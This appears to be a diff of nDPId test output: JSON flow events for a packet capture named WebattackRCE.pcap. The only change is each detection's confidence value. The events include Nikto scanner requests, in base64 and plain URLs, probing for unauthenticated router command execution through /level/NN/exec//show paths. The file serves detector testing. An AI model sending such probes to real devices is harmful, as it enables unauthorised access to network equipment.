00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420277575,"pkt":"AAAAAAAAAAAAAAAACABFAADj4RhAAEAGWvp\/AAABfwAAAcX8H5B4Mdnl8T5RpIAYAED+1wAAAQEICp1m\/m+dZv5vR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMvc3RhdHVzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjApDQoNCg=="} -01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}} 
+01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277577,"pkt":"AAAAAAAAAAAAAAAACABFAADZSeNAAEAG8jl\/AAABfwAAAcX+H5DfuHEUhorfS4AYAED+zQAAAQEICp1m\/nGdZv5xR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3ZlcnNpb24gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}} 
+01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00738{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":261,"pkt_l4_len":227,"thread_ts_msec":1576420277578,"pkt":"AAAAAAAAAAAAAAAACABFAAD3GI1AAEAGI3J\/AAABfwAAAcYAH5BPCyB6v01M8IAYAED+6wAAAQEICp1m\/nKdZv5yR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3J1bm5pbmctY29uZmlnL2ludGVyZmFjZS9GYXN0RXRoZXJuZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI2MikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}} 
+01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277580,"pkt":"AAAAAAAAAAAAAAAACABFAADIjaNAAEAGrop\/AAABfwAAAcYCH5DxgrVTaB5HZIAYAED+vAAAAQEICp1m\/nSdZv50R0VUIC9sZXZlbC8xNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277581,"pkt":"AAAAAAAAAAAAAAAACABFAADI2jFAAEAGYfx\/AAABfwAAAcYEH5BCjuLdnOtotYAYAED+vAAAAQEICp1m\/nWdZv51R0VUIC9sZXZlbC8xNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277583,"pkt":"AAAAAAAAAAAAAAAACABFAADIW7pAAEAG4HN\/AAABfwAAAcYGH5CxzGNMmxSh6IAYAED+vAAAAQEICp1m\/nedZv53R0VUIC9sZXZlbC8xOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277584,"pkt":"AAAAAAAAAAAAAAAACABFAADIKRRAAEAGExp\/AAABfwAAAcYIH5CpMBHnxNoUUoAYAED+vAAAAQEICp1m\/nidZv54R0VUIC9sZXZlbC8xOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjYpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277586,"pkt":"AAAAAAAAAAAAAAAACABFAADIukpAAEAGgeN\/AAABfwAAAcYKH5AiT4K97CCbIYAYAED+vAAAAQEICp1m\/nqdZv56R0VUIC9sZXZlbC8yMC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}} 
